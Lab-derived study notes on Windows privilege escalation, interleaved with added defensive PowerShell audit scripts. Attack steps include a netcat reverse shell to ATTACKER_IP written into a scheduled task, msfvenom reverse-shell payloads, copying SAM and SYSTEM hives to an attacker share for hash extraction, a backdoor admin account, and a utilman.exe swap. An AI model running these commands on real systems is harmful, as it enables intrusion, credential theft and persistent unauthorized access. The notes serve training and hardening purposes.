Windows Priv Esc

Thank you to both TryHackMe and HackTheBox

=====================================================================================================================================================================================================


Initial enumeration

1. systeminfo = OS version, build number, installed patches etc
2. wmic qfe get Caption, Description = how quickly are systems being patched and updated
3. net start — installed and started Windows services (very long list)
4. wmic product get name,version,vendor — alternative to the above, but only for installed applications

5. whoami /priv — your privileges
6. whoami /groups — which groups you belong to
7. net user — other users
8. net group / net localgroup — available groups (domain / local)
9. net localgroup administrators — list the users belonging to a specific group
10. net accounts — local account settings on the machine
11. net accounts /domain — if the machine belongs to a domain: learn about the password policy etc
12. ipconfig / ipconfig /all — system network config; /all also shows the DNS servers
13. netstat -abno — listening ports and connections, with the owning process and its executable
14. arp -a — discover other systems on the same LAN

 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — 

Unattended Windows installs — may contain credentials:

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

PowerShell history

from cmd: type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
from powershell: type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt


Saved Windows creds:

cmdkey /list — list the credentials saved for the current user
runas /savedcred /user:admin cmd.exe — run a command as a user whose credentials are saved


IIS Configuration

- web.config — IIS config

Locations where it can be found:
C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

find database connection strings:
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Retrieve creds from software: PuTTY
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
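The checks above are the places credential residue tends to survive. The following script is an added example (mine, not part of the original notes or of the TryHackMe/HackTheBox material) that audits those same locations from the defender's side: it reports which of them exist and how many suspect entries each holds, without printing any secret. The function names are mine; the file paths, the PSReadLine history location and the PuTTY ProxyPassword value name are the real ones. It assumes it runs elevated so that every user's history file is readable.

```powershell
# Added example, not part of the original notes or of the TryHackMe/HackTheBox
# material: a read-only audit that reports where the credential residue listed
# above still exists on a host. It prints locations and counts, never the
# secrets themselves. Run elevated to read every user's PowerShell history.

$UnattendFiles = @(
    'C:\Unattend.xml',
    'C:\Windows\Panther\Unattend.xml',
    'C:\Windows\Panther\Unattend\Unattend.xml',
    'C:\Windows\system32\sysprep.inf',
    'C:\Windows\system32\sysprep\sysprep.xml'
)
$WebConfigFiles = @(
    'C:\inetpub\wwwroot\web.config',
    'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config'
)
# Commands or arguments that usually carry a secret when typed interactively.
$HistoryPattern = 'password|-Credential|ConvertTo-SecureString|cmdkey|runas'

function Get-UnattendFindings {
    foreach ($file in $UnattendFiles) {
        if (-not (Test-Path -LiteralPath $file)) { continue }
        $detail = 'file present; inspect manually'
        if ($file -like '*.xml') {
            $total = 0; $plain = 0
            try {
                [xml]$doc = Get-Content -LiteralPath $file -Raw
                # local-name() sidesteps the urn:schemas-microsoft-com:unattend namespace.
                foreach ($pw in $doc.SelectNodes('//*[local-name()="Password"]')) {
                    $total++
                    $flag = $pw.SelectSingleNode('*[local-name()="PlainText"]')
                    if ($flag -and $flag.InnerText -eq 'true') { $plain++ }
                }
                $detail = "$total password element(s), $plain marked PlainText"
            } catch { $detail = 'file present but not parseable as XML' }
        }
        [pscustomobject]@{ Source = 'UnattendFile'; Location = $file; Detail = $detail }
    }
}

function Get-HistoryFindings {
    # PSReadLine keeps one history file per user profile.
    foreach ($userDir in Get-ChildItem -Path 'C:\Users' -Directory -ErrorAction SilentlyContinue) {
        $hist = Join-Path $userDir.FullName 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'
        if (-not (Test-Path -LiteralPath $hist)) { continue }
        $hits = @(Select-String -LiteralPath $hist -Pattern $HistoryPattern -ErrorAction SilentlyContinue)
        if ($hits.Count -gt 0) {
            $lines = ($hits | Select-Object -First 5 | ForEach-Object { $_.LineNumber }) -join ', '
            [pscustomobject]@{ Source = 'PSHistory'; Location = $hist; Detail = "$($hits.Count) suspect line(s), first at $lines" }
        }
    }
}

function Get-WebConfigFindings {
    foreach ($file in $WebConfigFiles) {
        if (-not (Test-Path -LiteralPath $file)) { continue }
        $hits = @(Select-String -LiteralPath $file -Pattern 'connectionString=.*password=' -ErrorAction SilentlyContinue)
        if ($hits.Count -gt 0) {
            [pscustomobject]@{ Source = 'WebConfig'; Location = $file; Detail = "$($hits.Count) connection string(s) with an embedded password" }
        }
    }
}

function Get-SavedCredentialFindings {
    # cmdkey /list shows only the current user's vault; one "Target:" line per entry.
    $targets = @(cmdkey /list | Where-Object { $_ -match '^\s*Target:' })
    if ($targets.Count -gt 0) {
        [pscustomobject]@{ Source = 'CmdKey'; Location = "vault of $env:USERNAME"; Detail = "$($targets.Count) saved credential(s)" }
    }
}

function Get-PuttyProxyFindings {
    # PuTTY stores proxy settings per saved session; ProxyPassword is its value name.
    $base = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
    if (-not (Test-Path -Path $base)) { return }
    foreach ($session in Get-ChildItem -Path $base) {
        if ((Get-ItemProperty -Path $session.PSPath).ProxyPassword) {
            [pscustomobject]@{ Source = 'PuTTYSession'; Location = $session.PSChildName; Detail = 'ProxyPassword is set' }
        }
    }
}

$findings = @(Get-UnattendFindings) + @(Get-HistoryFindings) + @(Get-WebConfigFindings) + @(Get-SavedCredentialFindings) + @(Get-PuttyProxyFindings)
if ($findings.Count -eq 0) { Write-Output 'No credential residue found in the audited locations.' } else { $findings | Format-Table -AutoSize -Wrap }
```

Each finding is something to clean up rather than to read: delete leftover unattend/sysprep files after imaging, clear or restrict the history files, move connection-string secrets out of web.config, and remove saved credentials that are no longer needed.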


Scheduled Tasks

schtasks
schtasks /query /tn vulntask /fo list /v
icacls c:\tasks\schtask.bat — check the file permissions: (F) = full control, (M) = modify

editing the file with our payload:
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat


AlwaysInstallElevated

.msi = Windows Installer files
can be configured to run with higher privileges from any user, even unprivileged accounts.

both of the following registry values need to be set (AlwaysInstallElevated = 1 in HKCU and in HKLM) for this to work; check them with:
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

generate an msfvenom shell:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=LOCAL_PORT -f msi -o malicious.msi

transfer the file over and run it with:
msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
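The two reg query lines only show the raw values; the condition that matters is that both hives hold a 1. The script below is an added example (mine, not part of the original notes or of the TryHackMe/HackTheBox material) that evaluates that condition and, with the -Remediate switch, turns the policy off. The function and switch names are mine; the registry paths and value name are the real ones.

```powershell
# Added example, not part of the original notes or of the TryHackMe/HackTheBox
# material: audit the AlwaysInstallElevated policy in both hives and, with
# -Remediate, turn it off. The audit works as any user; -Remediate needs an
# elevated prompt because it writes under HKLM.
[CmdletBinding()]
param([switch]$Remediate)

$InstallerKeys = @(
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    # One object per hive; Value is $null when the key or the value does not exist.
    foreach ($key in $InstallerKeys) {
        $value = $null
        if (Test-Path -Path $key) {
            $value = (Get-ItemProperty -Path $key -Name 'AlwaysInstallElevated' -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        [pscustomobject]@{ Key = $key; Value = $value; Enabled = ($value -eq 1) }
    }
}

$state = @(Get-AlwaysInstallElevatedState)
$state | Format-Table -AutoSize

# The policy only takes effect when BOTH the HKCU and the HKLM value are 1.
$fullyEnabled = @($state | Where-Object { -not $_.Enabled }).Count -eq 0
if ($fullyEnabled) {
    Write-Warning 'AlwaysInstallElevated is set in HKCU and HKLM: any user can install an MSI as SYSTEM.'
    if ($Remediate) {
        foreach ($key in $InstallerKeys) {
            Set-ItemProperty -Path $key -Name 'AlwaysInstallElevated' -Value 0 -Type DWord
        }
        Write-Output 'AlwaysInstallElevated set to 0 in both hives.'
    }
} else {
    Write-Output 'AlwaysInstallElevated is not fully enabled; MSI packages install with the invoking user''s rights.'
}
```

Save it as, say, Check-AlwaysInstallElevated.ps1 and run .\Check-AlwaysInstallElevated.ps1 -Remediate from an elevated prompt. If the value is being delivered by Group Policy (Administrative Templates > Windows Components > Windows Installer > "Always install with elevated privileges", under both Computer and User Configuration), a direct registry edit is reverted at the next policy refresh, so the lasting fix is to disable the policy setting itself.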

 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — 

ABUSING SERVICE MISCONFIGURATIONS

Insecure Permissions on Service Executable

- services are managed by the Service Control Manager (SCM)

sc qc
sc qc apphostsvc

Insecure permissions on the service executable:
sc qc WindowsScheduler

- look at the BINARY_PATH_NAME, that is the executable
icacls C:\PROGRA~2\SYSTEM~1\WService.exe

- on your Kali machine create a reverse shell and host it with a Python web server

- back on the victim machine
cd to the directory of the binary path from above: C:\PROGRA~2\SYSTEM~1
back up the original: move WService.exe WService.exe.bkp
move C:\Users\rev-svc.exe WService.exe
give perms: icacls WService.exe /grant Everyone:F

- set up a reverse listener

- restart the service
C:\> sc stop windowsscheduler
C:\> sc start windowsscheduler

NOTE: PowerShell has sc as an alias for Set-Content, so use sc.exe there


Unquoted Service Paths

sc qc "vncserver"

- are there spaces in the binary path? — the SCM won't know which binary to execute
- is the file located outside of Program Files / Program Files (x86)?

- create an executable on your box and serve it over HTTP:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe


Insecure Service Permissions

from tool: AccessChk

C:\tools\AccessChk> accesschk64.exe -qlc thmservice

look at the BUILTIN\Users group -
SERVICE_ALL_ACCESS

- create a reverse shell exe
- download it to the victim
- set up a listener on the attack machine

- use icacls to change perms
C:\> icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F

- change the service's associated executable and account
C:\> sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
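The scheduled-task and the three service sections above all come down to the same question: can a principal every ordinary user belongs to write to the binary, to a directory on an unquoted search path, or to the service's own DACL? The script below is an added example (mine, not part of the original notes or of the TryHackMe/HackTheBox material) that asks that question for every task and service on the host and reports the findings. The function names are mine; the ACL rights, the SDDL right tokens and the SCM search behaviour are standard. It assumes an elevated PowerShell so that every task, service and ACL can be read, and it uses sc.exe explicitly for the reason noted above.

```powershell
# Added example, not part of the original notes or of the TryHackMe/HackTheBox
# material: a read-only audit for the scheduled task and service weaknesses
# covered above. Run from an elevated PowerShell so every task, service and ACL
# can be read.

# Identities every interactive, non-admin user belongs to.
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Rights that let such a user replace a file, or create files in a directory
# (Modify and FullControl include these bits, so they are caught too).
$FileWriteRights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, ChangePermissions, TakeOwnership'
$DirWriteRights  = [System.Security.AccessControl.FileSystemRights]'WriteData, ChangePermissions, TakeOwnership'
# SDDL service-right tokens that allow reconfiguring or taking over a service:
# DC = change config, WD = write DACL, WO = write owner, GA/GW = generic all/write.
$DangerousServiceRights = 'DC', 'WD', 'WO', 'GA', 'GW'

function Test-LowPrivWritable {
    param([string]$Path)
    # Returns the low-privilege identities with write access to $Path (empty if none).
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return @() }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return @() }
    $needed = if (Test-Path -LiteralPath $Path -PathType Container) { $DirWriteRights } else { $FileWriteRights }
    $hits = foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        # Inherit-only ACEs apply to children, not to this object.
        if ([int]($rule.PropagationFlags -band [System.Security.AccessControl.PropagationFlags]::InheritOnly) -ne 0) { continue }
        if ($LowPrivPrincipals -notcontains $rule.IdentityReference.Value) { continue }
        if ([int]($rule.FileSystemRights -band $needed) -ne 0) { $rule.IdentityReference.Value }
    }
    return @($hits | Select-Object -Unique)
}

function Get-ServiceExecutable {
    param([string]$PathName)
    # "C:\a b\svc.exe" -x  ->  C:\a b\svc.exe ;  C:\a b\svc.exe -x  ->  C:\a b\svc.exe
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Get-UnquotedSearchDirectories {
    param([string]$Exe)
    # For C:\Program Files\My Svc\svc.exe the SCM tries C:\Program.exe, then
    # C:\Program Files\My.exe; return the directory each attempt lands in.
    $parts = $Exe -split ' '
    $dirs = for ($i = 1; $i -lt $parts.Count; $i++) {
        Split-Path -Path ($parts[0..($i - 1)] -join ' ') -Parent
    }
    return @($dirs | Select-Object -Unique)
}

function Invoke-TaskServiceAudit {
    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding($Type, $Name, $Path, $Detail) {
        $findings.Add([pscustomobject]@{ Type = $Type; Name = $Name; Path = $Path; Detail = $Detail })
    }
    # 1. Scheduled tasks whose action executable a low-privilege user can overwrite.
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            $writers = Test-LowPrivWritable -Path $exe
            if ($writers.Count -gt 0) { Add-Finding 'TaskBinaryWritable' "$($task.TaskPath)$($task.TaskName)" $exe ($writers -join ', ') }
        }
    }
    # 2. Services: writable binaries, unquoted paths, and weak service DACLs.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ServiceExecutable -PathName $svc.PathName
        $writers = Test-LowPrivWritable -Path $exe
        if ($writers.Count -gt 0) { Add-Finding 'ServiceBinaryWritable' $svc.Name $exe ($writers -join ', ') }
        if ($svc.PathName -notmatch '^"' -and $exe -match ' ') {
            $writableDirs = @(Get-UnquotedSearchDirectories -Exe $exe | Where-Object { (Test-LowPrivWritable -Path $_).Count -gt 0 })
            $detail = if ($writableDirs.Count -gt 0) { 'writable search dir: ' + ($writableDirs -join ', ') } else { 'no writable search dir; still quote the path' }
            Add-Finding 'UnquotedServicePath' $svc.Name $svc.PathName $detail
        }
        # sc.exe (not the PowerShell alias sc = Set-Content) prints the service DACL as SDDL.
        $sddl = ((sc.exe sdshow $svc.Name) -join '').Trim()
        if ($sddl -match '^D:') {
            $dacl = ($sddl -split 'S:')[0]
            foreach ($ace in [regex]::Matches($dacl, '\(A;[^;]*;([^;]*);;;(BU|WD|AU|IU)\)')) {
                $tokens = [regex]::Matches($ace.Groups[1].Value, '..') | ForEach-Object { $_.Value }
                $bad = @($tokens | Where-Object { $DangerousServiceRights -contains $_ })
                if ($bad.Count -gt 0) { Add-Finding 'ServiceDaclWeak' $svc.Name $ace.Groups[2].Value ($bad -join ',') }
            }
        }
    }
    return $findings
}

Invoke-TaskServiceAudit | Sort-Object Type, Name | Format-Table -AutoSize -Wrap
```

A ServiceBinaryWritable or TaskBinaryWritable finding is fixed by removing the write ACE from the file (and checking who owns it), an UnquotedServicePath finding by quoting BINARY_PATH_NAME with sc.exe config, and a ServiceDaclWeak finding by resetting the service DACL with sc.exe sdset so that only administrators and SYSTEM hold DC, WD and WO. The inherit-only check matters: the root of C:\ grants Authenticated Users an inherit-only Modify ACE that does not apply to C:\ itself, and without that check every unquoted path would look exploitable.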

 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

ABUSING DANGEROUS PRIVILEGES

SeBackup / SeRestore

whoami /priv

- back up the SAM and SYSTEM hives
reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive

- on the attacking machine
mkdir share
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share

- copy the files over
C:\> copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\
C:\> copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public\

- extract the hashes from the hives using secretsdump.py
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL

SeTakeOwnership

Abusing utilman.exe

- first take ownership
takeown /f C:\Windows\System32\Utilman.exe

- give yourself full perms
icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F

- replace utilman.exe with a copy of cmd.exe
copy cmd.exe utilman.exe

- then go to Start and lock your screen
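Both techniques in this section start from a privilege that whoami /priv shows the user holding, so the defender's first question is who has been granted them. The script below is an added example (mine, not part of the original notes or of the TryHackMe/HackTheBox material) that exports the User Rights Assignment policy with secedit, resolves the holders of the privileges named in this section to account names, and then checks that Utilman.exe still carries a valid Microsoft signature and TrustedInstaller ownership, which are exactly the two properties the takeown/copy sequence above destroys. The function names are mine; the secedit syntax, the privilege names and the owner/signature checks are standard. It assumes an elevated prompt, since secedit cannot export the policy otherwise.

```powershell
# Added example, not part of the original notes or of the TryHackMe/HackTheBox
# material: list which principals hold the privileges abused in this section
# and check that Utilman.exe is still the Microsoft-signed, TrustedInstaller-
# owned original. Needs an elevated prompt (secedit exports the local policy).

$DangerousPrivileges = @('SeBackupPrivilege', 'SeRestorePrivilege', 'SeTakeOwnershipPrivilege',
                         'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege')

function Get-PrivilegeAssignments {
    # Exports the "User Rights Assignment" part of the local policy and returns
    # one object per (privilege, account) pair for the privileges above.
    $cfg = Join-Path $env:TEMP 'secpol-audit.inf'
    secedit.exe /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    try {
        foreach ($line in Get-Content -LiteralPath $cfg) {
            if ($line -match '^(Se\w+Privilege)\s*=\s*(.*)$' -and $DangerousPrivileges -contains $Matches[1]) {
                $priv = $Matches[1]
                foreach ($entry in ($Matches[2] -split ',')) {
                    $entry = $entry.Trim()
                    if (-not $entry) { continue }
                    $account = $entry
                    if ($entry.StartsWith('*')) {
                        # secedit writes SIDs with a leading '*'; translate to a name where possible.
                        $sid = New-Object System.Security.Principal.SecurityIdentifier($entry.Substring(1))
                        try { $account = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $account = $sid.Value }
                    }
                    [pscustomobject]@{ Privilege = $priv; Account = $account }
                }
            }
        }
    } finally {
        Remove-Item -LiteralPath $cfg -ErrorAction SilentlyContinue
    }
}

function Test-UtilmanIntegrity {
    # Utilman.exe runs as SYSTEM from the lock screen; a swapped-in cmd.exe loses
    # the Microsoft signature and the TrustedInstaller owner that takeown replaces.
    $path = Join-Path $env:SystemRoot 'System32\Utilman.exe'
    $sig = Get-AuthenticodeSignature -FilePath $path
    $owner = (Get-Acl -LiteralPath $path).Owner
    [pscustomobject]@{
        Path       = $path
        Signature  = $sig.Status
        Signer     = $sig.SignerCertificate.Subject
        Owner      = $owner
        Suspicious = ($sig.Status -ne 'Valid' -or $owner -ne 'NT SERVICE\TrustedInstaller')
    }
}

Get-PrivilegeAssignments | Sort-Object Privilege, Account | Format-Table -AutoSize
Test-UtilmanIntegrity | Format-List
```

On a default install SeBackupPrivilege and SeRestorePrivilege resolve to BUILTIN\Administrators and BUILTIN\Backup Operators, and SeTakeOwnershipPrivilege to Administrators only; any extra account or group in that list, and in particular ordinary users added to Backup Operators, is what the SeBackup section above relies on. A Suspicious = True result for Utilman.exe means the file is no longer the signed original and should be restored from a known-good source.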

SeImpersonate / SeAssignPrimaryToken

 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

ABUSING VULNERABLE SOFTWARE

Unpatched Software

wmic product get name,version,vendor

- exploiting Druva case study, covered in more detail in HTB Academy
https://packetstormsecurity.com/files/160404/Druva-inSync-Windows-Client-6.6.3-Privilege-Escalation.html

- create a user called pwnd and add it to the administrators group
- change the "cmd" in the payload text to:

net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add

- paste the script directly into PowerShell

 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Tools

winPEAS : https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

PrivescCheck : https://github.com/itm4n/PrivescCheck

WES-NG: Windows Exploit Suggester : https://github.com/bitsadmin/wesng

Metasploit : post/multi/recon/local_exploit_suggester (if you already have a shell)